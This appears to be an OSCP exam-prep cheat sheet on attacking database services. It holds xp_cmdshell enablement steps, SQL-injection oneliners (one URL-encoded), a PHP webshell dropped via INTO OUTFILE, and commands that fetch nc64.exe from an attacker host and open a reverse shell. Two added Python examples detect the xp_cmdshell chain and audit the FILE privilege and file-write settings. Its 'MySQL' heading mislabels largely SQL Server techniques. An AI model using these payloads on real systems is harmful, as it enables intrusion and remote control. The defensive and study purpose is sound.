> For the complete documentation index, see [llms.txt](https://personal-archive.gitbook.io/oscp-exam-prep/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://personal-archive.gitbook.io/oscp-exam-prep/commons/service-enumeration/mysql-3306.md).

# MYSQL (3306)

## 1. Basics

### Scanning

{% code overflow="wrap" %}

```
sudo nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
```

{% endcode %}

### Initiate connection

```
# MySQL client: no space between -p and the password, otherwise mysql
# prompts for the password and treats <pass> as the database name
mysql -h <IP> -u <username> -p<pass> [-P <port>]

# MSSQL (TDS) client
sqsh -S <IP> -U <username> -P <password> -D <database>

# Windows SQL Server instances with Windows (domain) authentication
impacket-mssqlclient <domain>/<compromised username>:<password>@<IP> -windows-auth
```

## 2. Reverse Shell

1. Initiate a connection with either `mysql` or `sqsh` (in `sqsh`, type `GO` after a query to send it).
2. Run the following T-SQL commands one by one:

```
-- Get users that can run xp_cmdshell
USE master
EXEC sp_helprotect 'xp_cmdshell'

-- Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

-- This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE

-- This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
EXEC master..xp_cmdshell 'whoami'
```

Manual Code Execution (via SQL injection):

{% code overflow="wrap" %}

```
-- Steps to enable xp_cmdshell, one statement per request
'; EXEC sp_configure "show advanced options", 1; -- //
'; RECONFIGURE; -- //
'; EXEC sp_configure "xp_cmdshell", 1; -- //
'; RECONFIGURE; -- //

'; EXEC xp_cmdshell "whoami"; -- //

-- Oneliner
'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "whoami"; -- //

-- URL encoded oneliner
%27%3B%20EXEC%20sp%5Fconfigure%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22whoami%22%3B%20%2D%2D%20%2F%2F
```

{% endcode %}
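From the defender's side, the whole sequence above (show advanced options, RECONFIGURE, enable xp_cmdshell, execute) is a compact signature, but it has to be matched after URL-decoding and comment-stripping or the injected oneliner slips past a naive rule. The following Python is an added example, not part of the original notes: it normalises captured SQL text and reports which stages of the chain each client issued. The `client|statement` log format and the log lines themselves are constructed.

```python
"""Detect attempts to enable and use xp_cmdshell in captured SQL text.

Added example for this page (not from the original notes). Each line is
URL-decoded, stripped of SQL comments and whitespace-collapsed before the
sp_configure / RECONFIGURE / xp_cmdshell stages are matched, so interactive
T-SQL, injected statements and the URL-encoded oneliner all hit the same rule.
"""
import re
from urllib.parse import unquote

# One pattern per stage of the chain. A hit on any stage is worth a look;
# the full chain from one client is a strong signal.
STAGES = {
    "advanced_options": re.compile(r"sp_configure\s*['\"]?show advanced options['\"]?\s*,\s*['\"]?1", re.I),
    "enable_xp_cmdshell": re.compile(r"sp_configure\s*['\"]?xp_cmdshell['\"]?\s*,\s*['\"]?1", re.I),
    "reconfigure": re.compile(r"\bRECONFIGURE\b", re.I),
    # xp_cmdshell followed by a string or variable argument; the lookbehind
    # excludes 'xp_cmdshell' appearing as a quoted name (sp_configure, sp_helprotect,
    # sys.configurations lookups), which are reconnaissance rather than execution
    "exec_xp_cmdshell": re.compile(r"(?<!['\"\w])xp_cmdshell\s*['\"@]", re.I),
}

def normalise(sql: str) -> str:
    """URL-decode (twice, for double-encoded input), drop comments, collapse whitespace."""
    text = unquote(unquote(sql))
    text = re.sub(r"--[^\n]*", " ", text)            # strip "-- //"-style suffixes
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).strip()

def classify(sql: str) -> list[str]:
    """Return the names of the chain stages present in one statement."""
    text = normalise(sql)
    return [name for name, pat in STAGES.items() if pat.search(text)]

def scan(lines: list[str]) -> dict[str, set[str]]:
    """Aggregate the stages seen per client across a batch of 'client|statement' lines."""
    seen: dict[str, set[str]] = {}
    for line in lines:
        client, _, statement = line.partition("|")
        hits = classify(statement)
        if hits:
            seen.setdefault(client.strip(), set()).update(hits)
    return seen

def full_chain(stages: set[str]) -> bool:
    """True when a client both enabled and executed xp_cmdshell."""
    return {"advanced_options", "enable_xp_cmdshell", "exec_xp_cmdshell"} <= stages

# Constructed sample log: "<client>|<statement>", as a query log or proxy might record it.
SAMPLE_LOG = [
    "dba-host|SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';",
    "dba-host|EXEC sp_helprotect 'xp_cmdshell'",
    "10.0.0.5|SELECT name FROM sys.databases",
    "10.0.0.5|sp_configure 'show advanced options', '1'",
    "10.0.0.5|RECONFIGURE",
    "10.0.0.5|sp_configure 'xp_cmdshell', '1'",
    "10.0.0.5|EXEC master..xp_cmdshell 'whoami'",
    "10.0.0.9|SELECT * FROM products WHERE id = 1",
    # the URL-encoded oneliner from this page, as a web front end would log the parameter
    "10.0.0.9|%27%3B%20EXEC%20sp%5Fconfigure%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22whoami%22%3B%20%2D%2D%20%2F%2F",
]

if __name__ == "__main__":
    for client, stages in scan(SAMPLE_LOG).items():
        verdict = "FULL CHAIN" if full_chain(stages) else "partial"
        print(f"{client}: {verdict} {sorted(stages)}")
```

Note that the DBA's own checks (`sys.configurations`, `sp_helprotect`) produce no hits, because in both the name `xp_cmdshell` is a quoted argument rather than the procedure being executed; that distinction is what keeps the rule usable on a server where the state is legitimately audited.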

Payload Example:

{% code overflow="wrap" %}

```
# Insert webshell into web root directory (MySQL INTO OUTFILE)
"<?php system($_GET['cmd']);?>", null, null, null INTO OUTFILE "/web/root/directory/webshell.php"

# Initiate reverse shell with nc64.exe via the injected webshell (run on the target)
curl http://<IP>/nc64.exe -o c:/windows/temp/nc64.exe
c:/windows/temp/nc64.exe -e cmd.exe <IP> <port>
```

{% endcode %}
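The `INTO OUTFILE` write above only succeeds when the MySQL account holds the global `FILE` privilege and the server's `secure_file_priv` setting does not confine file writes away from the web root (an empty value means no path restriction, `NULL` disables file import/export entirely, and a directory limits reads and writes to that directory). The following Python is an added example, not part of the original notes: it audits a `my.cnf` fragment and `SHOW GRANTS` output for those two conditions. The config text, grant lines and web root path are constructed.

```python
"""Audit a MySQL config and grants for the conditions behind an INTO OUTFILE webshell drop.

Added example (not from the original notes). Checks secure_file_priv in the
[mysqld] section and the FILE privilege in SHOW GRANTS output; a webshell can
only be written into the web root when both allow it.
"""
from __future__ import annotations
import posixpath
import re

def parse_mysqld_section(cfg_text: str) -> dict[str, str | None]:
    """Return options from the [mysqld] section as {name: value}; bare options map to None."""
    opts: dict[str, str | None] = {}
    section = None
    for raw in cfg_text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop inline and full-line comments
        if not line or line.startswith(";"):
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            section = m.group(1).strip().lower()
            continue
        if section != "mysqld":
            continue
        key, sep, value = line.partition("=")
        key = key.strip().replace("-", "_").lower()   # my.cnf accepts dashes or underscores
        opts[key] = value.strip().strip("\"'") if sep else None
    return opts

def outfile_policy(opts: dict[str, str | None]) -> str:
    """Classify secure_file_priv as 'unrestricted', 'disabled' or 'confined:<dir>'."""
    value = opts.get("secure_file_priv")
    if value is None or value == "":
        return "unrestricted"
    if value.upper() == "NULL":
        return "disabled"
    return f"confined:{posixpath.normpath(value)}"

def can_write_to(opts: dict[str, str | None], target_dir: str) -> bool:
    """Would INTO OUTFILE be allowed to write into target_dir under this config?"""
    policy = outfile_policy(opts)
    if policy == "unrestricted":
        return True
    if policy == "disabled":
        return False
    allowed = policy.split(":", 1)[1]
    target = posixpath.normpath(target_dir)
    return target == allowed or target.startswith(allowed.rstrip("/") + "/")

def has_file_privilege(grants: list[str]) -> bool:
    """FILE is a global privilege, so it only ever appears in a GRANT ... ON *.* line."""
    for grant in grants:
        m = re.match(r"GRANT\s+(.+?)\s+ON\s+\*\.\*", grant, re.I)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        if privs & {"FILE", "ALL", "ALL PRIVILEGES"}:
            return True
    return False

def assess(cfg_text: str, grants: list[str], web_root: str) -> dict:
    """Combine both checks: the drop needs the FILE privilege AND a path policy reaching web_root."""
    opts = parse_mysqld_section(cfg_text)
    file_priv = has_file_privilege(grants)
    return {
        "policy": outfile_policy(opts),
        "file_privilege": file_priv,
        "exposed": file_priv and can_write_to(opts, web_root),
    }

# Constructed sample inputs.
WEAK_CNF = """
[client]
port = 3306

[mysqld]
bind-address = 0.0.0.0
secure-file-priv = ""        # no path restriction on LOAD DATA / INTO OUTFILE
local-infile = 1
"""

HARDENED_CNF = """
[mysqld]
bind-address = 127.0.0.1
secure_file_priv = /var/lib/mysql-files
local_infile = 0
"""

WEB_APP_GRANTS = ["GRANT FILE ON *.* TO 'web'@'%'", "GRANT SELECT, INSERT ON `shop`.* TO 'web'@'%'"]
LEAST_PRIV_GRANTS = ["GRANT SELECT, INSERT ON `shop`.* TO 'web'@'%'"]

if __name__ == "__main__":
    for label, cfg, grants in [("weak", WEAK_CNF, WEB_APP_GRANTS), ("hardened", HARDENED_CNF, WEB_APP_GRANTS),
                               ("least-priv", WEAK_CNF, LEAST_PRIV_GRANTS)]:
        print(label, assess(cfg, grants, "/var/www/html"))
```

The two checks are independent remediations: dropping `FILE` from the application account stops the write even on a server with an empty `secure_file_priv`, and a confined `secure_file_priv` stops it even for an over-privileged account.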
